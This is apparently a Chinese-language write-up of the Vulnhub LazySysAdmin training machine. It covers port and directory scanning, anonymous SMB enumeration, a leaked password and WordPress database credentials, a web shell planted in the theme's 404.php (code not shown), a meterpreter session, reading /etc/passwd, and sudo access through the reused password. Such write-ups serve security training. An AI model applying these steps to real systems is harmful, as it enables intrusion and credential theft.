Vulnhub靶机之LAZYSYSADMIN
基本信息
- 难度:超级简单
- Name: LazySysAdmin: 1
- Date release: 20 Sep 2017
- Download (Mirror): https://download.vulnhub.com/lazysysadmin/Lazysysadmin.zip
测试过程
端口暴露情况:
Nmap scan report for 192.168.146.138
Host is up, received syn-ack (0.0015s latency).
Scanned at 2023-10-12 23:18:30 EDT for 3s
Not shown: 65529 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
139/tcp open netbios-ssn syn-ack
445/tcp open microsoft-ds syn-ack
3306/tcp open mysql syn-ack
6667/tcp open irc syn-ack
-
思路:
- 肯定是先测WEB
- 然后是445端口
- 最后是Mysql和SSH的爆破
-
测试80端口
-
全是静态页面,所以需要扫目录
Target: http://192.168.146.138/ [23:27:46] Starting: [23:28:03] 200 - 743B - /apache/ [23:28:15] 200 - 35KB - /index.html [23:28:16] 200 - 76KB - /info.php [23:28:16] 301 - 322B - /javascript -> http://192.168.146.138/javascript/ [23:28:22] 301 - 315B - /old -> http://192.168.146.138/old/ [23:28:22] 200 - 737B - /old/ [23:28:24] 301 - 322B - /phpmyadmin -> http://192.168.146.138/phpmyadmin/ [23:28:25] 200 - 8KB - /phpmyadmin/index.php 测试没有弱密码 [23:28:25] 200 - 8KB - /phpmyadmin/ [23:28:28] 200 - 92B - /robots.txt [23:28:33] 301 - 316B - /test -> http://192.168.146.138/test/ [23:28:33] 200 - 739B - /test/ [23:28:37] 301 - 314B - /wp -> http://192.168.146.138/wp/ [23:28:37] 200 - 3KB - /wordpress/wp-login.php 测试没有弱密码 [23:28:37] 200 - 12KB - /wordpress/ [23:28:38] 200 - 735B - /wp/ 所以先搁置一下,看看445端口,因为开着Samaba服务 -
445端口
- 工具使用
Enum4linux 是用于枚举windows和Linux系统上的SMB服务的工具。 root@kali:~# enum4linux -h enum4linux v0.9.1 (http://labs.portcullis.co.uk/application/enum4linux/) Copyright (C) 2011 Mark Lowe (mrl@portcullis-security.com) Simple wrapper around the tools in the samba package to provide similar functionality to enum.exe (formerly from www.bindview.com). Some additional features such as RID cycling have also been added for convenience. Usage: ./enum4linux.pl [options] ip Options are (like "enum"): -U get userlist -M get machine list* -S get sharelist -P get password policy information -G get group and member list -d be detailed, applies to -U and -S -u user specify username to use (default "") -p pass specify password to use (default "")-
扫描发现空连接
erver 192.168.146.138 allows sessions using username '', password '' ===============================( Getting domain SID for 192.168.146.138 )=============================== Domain Name: WORKGROUP Domain Sid: (NULL SID) [+] Can't determine if host is -
使用smbclient 连接
smbclient -L 192.168.146.138 #查看共享目录 具体用法自己查看 Password for [WORKGROUP\kali]: Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers share$ Disk Sumshare IPC$ IPC IPC Service (Web server) Reconnecting with SMB1 for workgroup listing. Server Comment --------- ------- Workgroup Master --------- ------- WORKGROUP smbclient //192.168.146.138/share$ #IPC$无权限 Password for [WORKGROUP\kali]: Try "help" to get a list of possible commands. smb: \> ls . D 0 Tue Aug 15 07:05:52 2017 .. D 0 Mon Aug 14 08:34:47 2017 wordpress D 0 Thu Oct 12 23:21:40 2023 Backnode_files D 0 Mon Aug 14 08:08:26 2017 wp D 0 Tue Aug 15 06:51:23 2017 deets.txt N 139 Mon Aug 14 08:20:05 2017 robots.txt N 92 Mon Aug 14 08:36:14 2017 todolist.txt N 79 Mon Aug 14 08:39:56 2017 apache D 0 Mon Aug 14 08:35:19 2017 index.html N 36072 Sun Aug 6 01:02:15 2017 info.php N 20 Tue Aug 15 06:55:19 2017 test D 0 Mon Aug 14 08:35:10 2017 old D 0 Mon Aug 14 08:35:13 2017 smb: \> more deets.txt #发现意思密码文件,继续查看wordpress配置文件,因为其包含数据库连接密码 CBF Remembering all these passwords. Remember to remove this file and update your password after we push out the server. Password 12345 smb: \wordpress\> more wp-config.php /** The name of the database for WordPress */ define('DB_NAME', 'wordpress'); /** MySQL database username */ define('DB_USER', 'Admin'); /** MySQL database password */ define('DB_PASSWORD', 'TogieMYSQL12345^^'); /** MySQL hostname */ define('DB_HOST', 'localhost'); -
getshell
- 登录wordpress后台,发现其编辑器可以直接写shell
-
找到404.php的路径
3029776 blocks of size 1024. 1451776 blocks available smb: \wordpress\wp-content\themes\twentyfifteen\> ls . D 0 Wed Aug 2 17:02:01 2017 .. D 0 Thu Oct 12 23:21:37 2023 content-page.php N 1117 Tue Dec 16 08:00:22 2014 archive.php N 1914 Thu Dec 11 05:24:21 2014 search.php N 1405 Tue Dec 16 08:00:22 2014 404.php N 1434 Thu Oct 12 11:12:34 2023 index.php N 1765 Thu Dec 11 05:24:21 2014 content.php N 1702 Tue Dec 16 08:00:22 2014 content-none.php N 1166 Tue Dec 16 08:00:22 2014 content-link.php N 1753 Tue Dec 16 08:00:22 2014 page.php N 902 Wed Nov 19 15:28:25 2014 style.css N 97742 Thu Jun 8 00:43:33 2017 genericons D 0 Wed Aug 2 17:02:01 2017 readme.txt N 3501 Thu Jun 8 00:43:33 2017 single.php N 1528 Fri Dec 12 13:37:22 2014 sidebar.php N 1313 Wed Nov 19 15:28:25 2014 js D 0 Wed Aug 2 17:02:01 2017 functions.php N 13857 Sat Oct 22 21:56:32 2016 header.php N 1846 Wed Mar 9 18:02:28 2016 rtl.css N 12458 Thu May 25 11:19:42 2017 image.php N 2940 Tue Dec 16 08:00:22 2014 footer.php N 823 Tue Dec 16 08:00:22 2014 content-search.php N 1101 Tue Dec 16 08:00:22 2014 css D 0 Wed Aug 2 17:02:01 2017 comments.php N 1473 Tue Dec 16 08:00:22 2014 screenshot.png N 576231 Fri Mar 18 13:01:29 2016 inc D 0 Wed Aug 2 17:02:01 2017 author-bio.php N 1141 Tue Dec 16 08:00:22 2014 3029776 blocks of size 1024. 1451776 blocks available 后面的就不用说了,懂得都懂 -
直接上MSF,收集基础信息,尝试提权
meterpreter > cat /etc/passwd #发现除root外还有这个用户 togie:x:1000:1000:togie,,,:/home/togie:/bin/rbash 之前发现疑似的密码上去试试 这都不用提权了,直接上就能用sudo togie@LazySysAdmin:~$ sudo -l [sudo] password for togie: Matching Defaults entries for togie on LazySysAdmin: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User togie may run the following commands on LazySysAdmin: (ALL : ALL) ALL togie@LazySysAdmin:~$ id uid=1000(togie) gid=1000(togie) groups=1000(togie),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare) -
靶机结束总结
- 需要扫目录
- enum4linux账号密码枚举
- smbclient连接
-